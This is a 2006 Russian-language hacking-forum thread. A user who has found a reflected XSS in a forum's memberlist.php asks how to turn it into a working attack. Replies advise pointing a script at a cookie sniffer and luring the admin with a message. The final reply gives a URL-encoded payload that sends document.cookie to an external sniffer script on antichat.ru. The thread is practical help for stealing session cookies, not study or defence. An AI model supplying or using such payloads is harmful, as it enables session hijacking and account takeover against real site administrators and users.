Вопрос по использованию пассивной Xss

Discussion in 'Песочница' started by add, 7 Jul 2006.

  1. add

    add Banned

    Joined:
    4 Jul 2006
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    народ помогите пожалуйсто вот чё я нагрёб:
    memberlist.php?what=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E%3C%22&perpage=10
    как мне составить боевую XSS и куда впихнуть будучи поставленную XSS
    Зарание блогодарен!
     
  2. m2infect

    m2infect Elder - Старейшина

    Joined:
    20 Jun 2006
    Messages:
    34
    Likes Received:
    4
    Reputations:
    3
    Ты получил сессию. А а тебе нужен кук. Тебе надо довабить скрип, где указан линк на сниф + кук. Спмотри описание снифера, там есть пример.
    Удачи!
    Если что, то пиши в ПМ.
     
    1 person likes this.
  3. Sn@k3

    Sn@k3 Elder - Старейшина

    Joined:
    13 Apr 2006
    Messages:
    1,000
    Likes Received:
    438
    Reputations:
    90
    это обыный алерт, а чтобы плюшку дёрнуть надо сначало узнать версию форума), после кидаешь письмо админу со снифером,крч понял, не буду объяснять дофига такого на АЧАТе, поиск рулит
     
  4. Romaxa55

    Romaxa55 Banned

    Joined:
    19 Oct 2005
    Messages:
    144
    Likes Received:
    30
    Reputations:
    4
    Попробуй такой запрос:

    Code:
    memberlist.php?what=%22%3E%3Cscript%3E%69%6D%67%20%3D%20%6E%65%77%20%49%6D%61%67%65%28%29%3B%20%69%6D%67%2E%73%72%63%20%3D%20%22%68%74%74%70%3A%2F%2F%61%6E%74%69%63%68%61%74%2E%72%75%2F%63%67%69%2D%62%69%6E%2F%73%2E%6A%70%67%3F%22%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B9%3C%2Fscript%3E%3C%22&perpage=10
     
Loading...
Similar Threads - Вопрос использованию пассивной
  1. gilo20
    Replies:
    2
    Views:
    2,552
  2. Dobi768
    Replies:
    2
    Views:
    2,450
  3. avva99on
    Replies:
    0
    Views:
    2,444